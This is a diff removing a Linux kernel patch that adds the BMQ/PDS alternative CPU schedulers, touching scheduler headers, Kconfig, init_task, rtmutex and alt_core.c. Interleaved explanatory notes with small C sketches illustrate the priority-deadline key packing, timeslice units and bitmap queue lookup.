---- a/include/linux/sched/deadline.h
-+++ b/include/linux/sched/deadline.h
-@@ -1,5 +1,24 @@
- /* SPDX-License-Identifier: GPL-2.0 */
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+static inline int dl_task(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#define __tsk_deadline(p)	(0UL)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
-+#endif
-+
-+#else
-+
-+#define __tsk_deadline(p)	((p)->dl.deadline)
-+
- /*
-  * SCHED_DEADLINE tasks has negative priorities, reflecting
-  * the fact that any of them has higher prio than RT and
-@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
- {
- 	return dl_prio(p->prio);
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- static inline bool dl_time_before(u64 a, u64 b)
- {
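
The PDS form of __tsk_deadline above is worth a closer look: it packs the
priority into the top byte of a 64-bit key so that a single unsigned compare
orders tasks by priority first and deadline second. A standalone sketch of
the packing (the mask is added here for safety; the macro itself relies on
the deadline staying below 2^56):

#include <stdint.h>
#include <stdio.h>

static uint64_t pds_key(uint64_t prio, uint64_t deadline)
{
	return (prio << 56) | (deadline & ((1ULL << 56) - 1));
}

int main(void)
{
	/* A better (lower) prio wins regardless of deadline... */
	printf("%d\n", pds_key(1, 999) < pds_key(2, 0));	/* prints 1 */
	/* ...and equal prios fall back to the earlier deadline. */
	printf("%d\n", pds_key(2, 10) < pds_key(2, 20));	/* prints 1 */
	return 0;
}
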
-diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
-index ab83d85e1183..6af9ae681116 100644
---- a/include/linux/sched/prio.h
-+++ b/include/linux/sched/prio.h
-@@ -18,6 +18,32 @@
- #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
- #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+/* Undefine MAX_PRIO and DEFAULT_PRIO */
-+#undef MAX_PRIO
-+#undef DEFAULT_PRIO
-+
-+/* +/- priority levels from the base priority */
-+#ifdef CONFIG_SCHED_BMQ
-+#define MAX_PRIORITY_ADJ	(7)
-+
-+#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
-+#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define MAX_PRIORITY_ADJ	(0)
-+
-+#define MIN_NORMAL_PRIO		(128)
-+#define NORMAL_PRIO_NUM		(64)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
-+#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
-+#endif
-+
-+#endif /* CONFIG_SCHED_ALT */
-+
- /*
-  * Convert user-nice values [ -20 ... 0 ... 19 ]
-  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
-diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
-index 994c25640e15..8c050a59ece1 100644
---- a/include/linux/sched/rt.h
-+++ b/include/linux/sched/rt.h
-@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
- 
- 	if (policy == SCHED_FIFO || policy == SCHED_RR)
- 		return true;
-+#ifndef CONFIG_SCHED_ALT
- 	if (policy == SCHED_DEADLINE)
- 		return true;
-+#endif
- 	return false;
- }
- 
-diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
-index 816df6cc444e..c8da08e18c91 100644
---- a/include/linux/sched/topology.h
-+++ b/include/linux/sched/topology.h
-@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
- 
- #endif	/* !CONFIG_SMP */
- 
--#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
-+#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
-+	!defined(CONFIG_SCHED_ALT)
- extern void rebuild_sched_domains_energy(void);
- #else
- static inline void rebuild_sched_domains_energy(void)
-diff --git a/init/Kconfig b/init/Kconfig
-index 94125d3b6893..c87ba766d354 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -819,6 +819,7 @@ menu "Scheduler features"
- config UCLAMP_TASK
- 	bool "Enable utilization clamping for RT/FAIR tasks"
- 	depends on CPU_FREQ_GOV_SCHEDUTIL
-+	depends on !SCHED_ALT
- 	help
- 	  This feature enables the scheduler to track the clamped utilization
- 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
-@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
- 
- 	  If in doubt, use the default value.
- 
-+menuconfig SCHED_ALT
-+	bool "Alternative CPU Schedulers"
-+	default y
-+	help
-+	  This feature enables the alternative CPU schedulers.
-+
-+if SCHED_ALT
-+
-+choice
-+	prompt "Alternative CPU Scheduler"
-+	default SCHED_BMQ
-+
-+config SCHED_BMQ
-+	bool "BMQ CPU scheduler"
-+	help
-+	  The BitMap Queue CPU scheduler for excellent interactivity and
-+	  responsiveness on the desktop and solid scalability on normal
-+	  hardware and commodity servers.
-+
-+config SCHED_PDS
-+	bool "PDS CPU scheduler"
-+	help
-+	  The Priority and Deadline based Skip list multiple queue CPU
-+	  Scheduler.
-+
-+endchoice
-+
-+endif
-+
- endmenu
- 
- #
-@@ -918,6 +948,7 @@ config NUMA_BALANCING
- 	depends on ARCH_SUPPORTS_NUMA_BALANCING
- 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
- 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
-+	depends on !SCHED_ALT
- 	help
- 	  This option adds support for automatic NUMA aware memory/task placement.
- 	  The mechanism is quite primitive and is based on migrating memory when
-@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
- 	depends on CGROUP_SCHED
- 	default CGROUP_SCHED
- 
-+if !SCHED_ALT
- config CFS_BANDWIDTH
- 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
- 	depends on FAIR_GROUP_SCHED
-@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
- 	  realtime bandwidth for them.
- 	  See Documentation/scheduler/sched-rt-group.rst for more information.
- 
-+endif #!SCHED_ALT
- endif #CGROUP_SCHED
- 
- config UCLAMP_TASK_GROUP
-@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
- 
- config SCHED_AUTOGROUP
- 	bool "Automatic process group scheduling"
-+	depends on !SCHED_ALT
- 	select CGROUPS
- 	select CGROUP_SCHED
- 	select FAIR_GROUP_SCHED
-diff --git a/init/init_task.c b/init/init_task.c
-index ff6c4b9bfe6b..19e9c662d1a1 100644
---- a/init/init_task.c
-+++ b/init/init_task.c
-@@ -75,9 +75,15 @@ struct task_struct init_task
- 	.stack		= init_stack,
- 	.usage		= REFCOUNT_INIT(2),
- 	.flags		= PF_KTHREAD,
-+#ifdef CONFIG_SCHED_ALT
-+	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+	.static_prio	= DEFAULT_PRIO,
-+	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+#else
- 	.prio		= MAX_PRIO - 20,
- 	.static_prio	= MAX_PRIO - 20,
- 	.normal_prio	= MAX_PRIO - 20,
-+#endif
- 	.policy		= SCHED_NORMAL,
- 	.cpus_ptr	= &init_task.cpus_mask,
- 	.user_cpus_ptr	= NULL,
-@@ -88,6 +94,17 @@ struct task_struct init_task
- 	.restart_block	= {
- 		.fn = do_no_restart_syscall,
- 	},
-+#ifdef CONFIG_SCHED_ALT
-+	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
-+#ifdef CONFIG_SCHED_BMQ
-+	.boost_prio	= 0,
-+	.sq_idx		= 15,
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+	.deadline	= 0,
-+#endif
-+	.time_slice	= HZ,
-+#else
- 	.se		= {
- 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
- 	},
-@@ -95,6 +112,7 @@ struct task_struct init_task
- 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
- 		.time_slice	= RR_TIMESLICE,
- 	},
-+#endif
- 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
- #ifdef CONFIG_SMP
- 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
-diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
-index c2f1fd95a821..41654679b1b2 100644
---- a/kernel/Kconfig.preempt
-+++ b/kernel/Kconfig.preempt
-@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
- 
- config SCHED_CORE
- 	bool "Core Scheduling for SMT"
--	depends on SCHED_SMT
-+	depends on SCHED_SMT && !SCHED_ALT
- 	help
- 	  This option permits Core Scheduling, a means of coordinated task
- 	  selection across SMT siblings. When enabled -- see
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index b474289c15b8..a23224b45b03 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
- 	return ret;
- }
- 
--#ifdef CONFIG_SMP
-+#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
- /*
-  * Helper routine for generate_sched_domains().
-  * Do cpusets a, b have overlapping effective cpus_allowed masks?
-@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
- 	/* Have scheduler rebuild the domains */
- 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
- }
--#else /* !CONFIG_SMP */
-+#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
- static void rebuild_sched_domains_locked(void)
- {
- }
-diff --git a/kernel/delayacct.c b/kernel/delayacct.c
-index e39cb696cfbd..463423572e09 100644
---- a/kernel/delayacct.c
-+++ b/kernel/delayacct.c
-@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
- 	 */
- 	t1 = tsk->sched_info.pcount;
- 	t2 = tsk->sched_info.run_delay;
--	t3 = tsk->se.sum_exec_runtime;
-+	t3 = tsk_seruntime(tsk);
- 
- 	d->cpu_count += t1;
- 
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 35e0a31a0315..64e368441cf4 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
- 			sig->curr_target = next_thread(tsk);
- 	}
- 
--	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
-+	add_device_randomness((const void*) &tsk_seruntime(tsk),
- 			      sizeof(unsigned long long));
- 
- 	/*
-@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
- 	sig->inblock += task_io_get_inblock(tsk);
- 	sig->oublock += task_io_get_oublock(tsk);
- 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
--	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
-+	sig->sum_sched_runtime += tsk_seruntime(tsk);
- 	sig->nr_threads--;
- 	__unhash_process(tsk, group_dead);
- 	write_sequnlock(&sig->stats_lock);
-diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
-index 7779ee8abc2a..5b9893cdfb1b 100644
---- a/kernel/locking/rtmutex.c
-+++ b/kernel/locking/rtmutex.c
-@@ -300,21 +300,25 @@ static __always_inline void
- waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
- {
- 	waiter->prio = __waiter_prio(task);
--	waiter->deadline = task->dl.deadline;
-+	waiter->deadline = __tsk_deadline(task);
- }
- 
- /*
-  * Only use with rt_mutex_waiter_{less,equal}()
-  */
- #define task_to_waiter(p)	\
--	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
-+	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
- 
- static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 						struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline < right->deadline);
-+#else
- 	if (left->prio < right->prio)
- 		return 1;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return dl_time_before(left->deadline, right->deadline);
-+#endif
- 
- 	return 0;
-+#endif
- }
- 
- static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 						 struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline == right->deadline);
-+#else
- 	if (left->prio != right->prio)
- 		return 0;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return left->deadline == right->deadline;
-+#endif
- 
- 	return 1;
-+#endif
- }
- 
- static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
-diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
-index 976092b7bd45..31d587c16ec1 100644
---- a/kernel/sched/Makefile
-+++ b/kernel/sched/Makefile
-@@ -28,7 +28,12 @@ endif
- # These compilation units have roughly the same size and complexity - so their
- # build parallelizes well and finishes roughly at once:
- #
-+ifdef CONFIG_SCHED_ALT
-+obj-y += alt_core.o
-+obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
-+else
- obj-y += core.o
- obj-y += fair.o
-+endif
- obj-y += build_policy.o
- obj-y += build_utility.o
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-new file mode 100644
-index 000000000000..a9e906b229eb
---- /dev/null
-+++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7982 @@
-+/*
-+ *  kernel/sched/alt_core.c
-+ *
-+ *  Core alternative kernel scheduler code and related syscalls
-+ *
-+ *  Copyright (C) 1991-2002  Linus Torvalds
-+ *
-+ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
-+ *		a whole lot of those previous things.
-+ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
-+ *		scheduler by Alfred Chen.
-+ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
-+ */
-+#include <linux/sched/cputime.h>
-+#include <linux/sched/debug.h>
-+#include <linux/sched/isolation.h>
-+#include <linux/sched/loadavg.h>
-+#include <linux/sched/mm.h>
-+#include <linux/sched/nohz.h>
-+#include <linux/sched/stat.h>
-+#include <linux/sched/wake_q.h>
-+
-+#include <linux/blkdev.h>
-+#include <linux/context_tracking.h>
-+#include <linux/cpuset.h>
-+#include <linux/delayacct.h>
-+#include <linux/init_task.h>
-+#include <linux/kcov.h>
-+#include <linux/kprobes.h>
-+#include <linux/nmi.h>
-+#include <linux/scs.h>
-+
-+#include <uapi/linux/sched/types.h>
-+
-+#include <asm/irq_regs.h>
-+#include <asm/switch_to.h>
-+
-+#define CREATE_TRACE_POINTS
-+#include <trace/events/sched.h>
-+#undef CREATE_TRACE_POINTS
-+
-+#include "sched.h"
-+
-+#include "pelt.h"
-+
-+#include "../../io_uring/io-wq.h"
-+#include "../smpboot.h"
-+
-+/*
-+ * Export tracepoints that act as a bare tracehook (ie: have no trace event
-+ * associated with them) to allow external modules to probe them.
-+ */
-+EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+#define sched_feat(x)	(1)
-+/*
-+ * Print a warning if need_resched is set for the given duration (if
-+ * LATENCY_WARN is enabled).
-+ *
-+ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
-+ * per boot.
-+ */
-+__read_mostly int sysctl_resched_latency_warn_ms = 100;
-+__read_mostly int sysctl_resched_latency_warn_once = 1;
-+#else
-+#define sched_feat(x)	(0)
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+#define ALT_SCHED_VERSION "v6.1-r4"
-+
-+/* rt_prio(prio) defined in include/linux/sched/rt.h */
-+#define rt_task(p)		rt_prio((p)->prio)
-+#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
-+#define task_has_rt_policy(p)	(rt_policy((p)->policy))
-+
-+#define STOP_PRIO		(MAX_RT_PRIO - 1)
-+
-+/* Default time slice is 4 ms; it can be set via the kernel parameter "sched_timeslice" */
-+u64 sched_timeslice_ns __read_mostly = (4 << 20);
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#include "bmq.h"
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+#include "pds.h"
-+#endif
-+
-+static int __init sched_timeslice(char *str)
-+{
-+	int timeslice_ms;
-+
-+	get_option(&str, &timeslice_ms);
-+	if (2 != timeslice_ms)
-+		timeslice_ms = 4;
-+	sched_timeslice_ns = timeslice_ms << 20;
-+	sched_timeslice_imp(timeslice_ms);
-+
-+	return 0;
-+}
-+early_param("sched_timeslice", sched_timeslice);
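
Two details of sched_timeslice() above are easy to miss: any value other than
2 silently falls back to 4, and the slice is stored as timeslice_ms << 20
nanoseconds (a power-of-two "millisecond"), so the nominal 4 ms slice is
really ~4.19 ms and the 2 ms one ~2.10 ms. Selecting the short slice is a
plain command-line token at boot:

	sched_timeslice=2
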
-+
-+/* Reschedule if less than this many ns (~100 μs) are left */
-+#define RESCHED_NS		(100 << 10)
-+
-+/**
-+ * sched_yield_type - Choose what sort of yield sched_yield will perform.
-+ * 0: No yield.
-+ * 1: Deboost and requeue task. (default)
-+ * 2: Set rq skip task.
-+ */
-+int sched_yield_type __read_mostly = 1;
-+
-+#ifdef CONFIG_SMP
-+static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
-+
-+DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
-+
-+#ifdef CONFIG_SCHED_SMT
-+DEFINE_STATIC_KEY_FALSE(sched_smt_present);
-+EXPORT_SYMBOL_GPL(sched_smt_present);
-+#endif
-+
-+/*
-+ * Keep a unique ID per domain (we use the first CPU's number in the cpumask of
-+ * the domain), this allows us to quickly tell if two cpus are in the same cache
-+ * domain, see cpus_share_cache().
-+ */
-+DEFINE_PER_CPU(int, sd_llc_id);
-+#endif /* CONFIG_SMP */
-+
-+static DEFINE_MUTEX(sched_hotcpu_mutex);
-+
-+DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
-+#endif
-+static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
-+static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
-+
-+/* sched_queue related functions */
-+static inline void sched_queue_init(struct sched_queue *q)
-+{
-+	int i;
-+
-+	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
-+	for (i = 0; i < SCHED_BITS; i++)
-+		INIT_LIST_HEAD(&q->heads[i]);
-+}
-+
-+/*
-+ * Init the idle task and put it into the queue structure of the rq.
-+ * IMPORTANT: may be called multiple times for a single cpu
-+ */
-+static inline void sched_queue_init_idle(struct sched_queue *q,
-+					 struct task_struct *idle)
-+{
-+	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
-+	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
-+	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
-+}
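
The queue initialized above is the heart of the design: one list head per
priority level plus a bitmap of non-empty levels, so picking the next task is
a find-first-bit followed by a list-head lookup. A userspace rendering of that
selection step (a sketch using a plain uint64_t instead of the kernel's
bitmap helpers):

#include <stdint.h>
#include <stdio.h>

struct demo_queue {
	uint64_t bitmap;	/* bit i set <=> priority level i is non-empty */
	/* struct list_head heads[64]; omitted from this sketch */
};

/* find_first_bit() equivalent: the lowest set bit is the best level. */
static int first_level(const struct demo_queue *q)
{
	return q->bitmap ? __builtin_ctzll(q->bitmap) : 64;
}

int main(void)
{
	struct demo_queue q = { .bitmap = (1ULL << 18) | (1ULL << 40) };

	printf("next task comes from level %d\n", first_level(&q)); /* 18 */
	return 0;
}
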
-+
-+static inline void
-+clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static inline void
-+set_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static atomic_t sched_prio_record = ATOMIC_INIT(0);
-+
-+/* watermark related functions */
-+static inline void update_sched_preempt_mask(struct rq *rq)
-+{
-+	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_prio = rq->prio;
-+	int cpu, pr;
-+
-+	if (prio == last_prio)
-+		return;
-+
-+	rq->prio = prio;
-+	cpu = cpu_of(rq);
-+	pr = atomic_read(&sched_prio_record);
-+
-+	if (prio < last_prio) {
-+		if (IDLE_TASK_SCHED_PRIO == last_prio) {
-+			cpumask_clear_cpu(cpu, sched_idle_mask);
-+			last_prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+			if (static_branch_likely(&sched_smt_present))
-+				cpumask_andnot(&sched_sg_idle_mask,
-+					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+#endif
-+		}
-+		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
-+
-+		return;
-+	}
-+	/* last_prio < prio */
-+	if (IDLE_TASK_SCHED_PRIO == prio) {
-+		cpumask_set_cpu(cpu, sched_idle_mask);
-+		prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present)) {
-+			cpumask_t tmp;
-+
-+			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
-+			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+				cpumask_or(&sched_sg_idle_mask,
-+					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+		}
-+#endif
-+	}
-+	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
-+}
-+
-+/*
-+ * This routine assumes that the idle task is always in the queue.
-+ */
-+static inline struct task_struct *sched_rq_first_task(struct rq *rq)
-+{
-+	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+	return list_first_entry(head, struct task_struct, sq_node);
-+}
-+
-+static inline struct task_struct *
-+sched_rq_next_task(struct task_struct *p, struct rq *rq)
-+{
-+	unsigned long idx = p->sq_idx;
-+	struct list_head *head = &rq->queue.heads[idx];
-+
-+	if (list_is_last(&p->sq_node, head)) {
-+		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
-+				    sched_idx2prio(idx, rq) + 1);
-+		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+		return list_first_entry(head, struct task_struct, sq_node);
-+	}
-+
-+	return list_next_entry(p, sq_node);
-+}
-+
-+static inline struct task_struct *rq_runnable_task(struct rq *rq)
-+{
-+	struct task_struct *next = sched_rq_first_task(rq);
-+
-+	if (unlikely(next == rq->skip))
-+		next = sched_rq_next_task(next, rq);
-+
-+	return next;
-+}
-+
-+/*
-+ * Serialization rules:
-+ *
-+ * Lock order:
-+ *
-+ *   p->pi_lock
-+ *     rq->lock
-+ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
-+ *
-+ *  rq1->lock
-+ *    rq2->lock  where: rq1 < rq2
-+ *
-+ * Regular state:
-+ *
-+ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
-+ * local CPU's rq->lock, it optionally removes the task from the runqueue and
-+ * always looks at the local rq data structures to find the most eligible task
-+ * to run next.
-+ *
-+ * Task enqueue is also under rq->lock, possibly taken from another CPU.
-+ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
-+ * the local CPU to avoid bouncing the runqueue state around [ see
-+ * ttwu_queue_wakelist() ]
-+ *
-+ * Task wakeup, specifically wakeups that involve migration, are horribly
-+ * complicated to avoid having to take two rq->locks.
-+ *
-+ * Special state:
-+ *
-+ * System-calls and anything external will use task_rq_lock() which acquires
-+ * both p->pi_lock and rq->lock. As a consequence the state they change is
-+ * stable while holding either lock:
-+ *
-+ *  - sched_setaffinity()/
-+ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
-+ *  - set_user_nice():		p->se.load, p->*prio
-+ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
-+ *				p->se.load, p->rt_priority,
-+ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
-+ *  - sched_setnuma():		p->numa_preferred_nid
-+ *  - sched_move_task():        p->sched_task_group
-+ *  - uclamp_update_active()	p->uclamp*
-+ *
-+ * p->state <- TASK_*:
-+ *
-+ *   is changed locklessly using set_current_state(), __set_current_state() or
-+ *   set_special_state(), see their respective comments, or by
-+ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
-+ *   concurrent self.
-+ *
-+ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
-+ *
-+ *   is set by activate_task() and cleared by deactivate_task(), under
-+ *   rq->lock. Non-zero indicates the task is runnable, the special
-+ *   ON_RQ_MIGRATING state is used for migration without holding both
-+ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
-+ *
-+ * p->on_cpu <- { 0, 1 }:
-+ *
-+ *   is set by prepare_task() and cleared by finish_task() such that it will be
-+ *   set before p is scheduled-in and cleared after p is scheduled-out, both
-+ *   under rq->lock. Non-zero indicates the task is running on its CPU.
-+ *
-+ *   [ The astute reader will observe that it is possible for two tasks on one
-+ *     CPU to have ->on_cpu = 1 at the same time. ]
-+ *
-+ * task_cpu(p): is changed by set_task_cpu(), the rules are:
-+ *
-+ *  - Don't call set_task_cpu() on a blocked task:
-+ *
-+ *    We don't care what CPU we're not running on, this simplifies hotplug,
-+ *    the CPU assignment of blocked tasks isn't required to be valid.
-+ *
-+ *  - for try_to_wake_up(), called under p->pi_lock:
-+ *
-+ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
-+ *
-+ *  - for migration called under rq->lock:
-+ *    [ see task_on_rq_migrating() in task_rq_lock() ]
-+ *
-+ *    o move_queued_task()
-+ *    o detach_task()
-+ *
-+ *  - for migration called under double_rq_lock():
-+ *
-+ *    o __migrate_swap_task()
-+ *    o push_rt_task() / pull_rt_task()
-+ *    o push_dl_task() / pull_dl_task()
-+ *    o dl_task_offline_migration()
-+ *
-+ */
-+
-+/*
-+ * Context: p->pi_lock
-+ */
-+static inline struct rq
-+*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock(&rq->lock);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock(&rq->lock);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			*plock = NULL;
-+			return rq;
-+		}
-+	}
-+}
-+
-+static inline void
-+__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
-+{
-+	if (NULL != lock)
-+		raw_spin_unlock(lock);
-+}
-+
-+static inline struct rq
-+*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
-+			  unsigned long *flags)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock_irqsave(&rq->lock, *flags);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&rq->lock, *flags);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			raw_spin_lock_irqsave(&p->pi_lock, *flags);
-+			if (likely(!p->on_cpu && !p->on_rq &&
-+				   rq == task_rq(p))) {
-+				*plock = &p->pi_lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
-+		}
-+	}
-+}
-+
-+static inline void
-+task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
-+			      unsigned long *flags)
-+{
-+	raw_spin_unlock_irqrestore(lock, *flags);
-+}
-+
-+/*
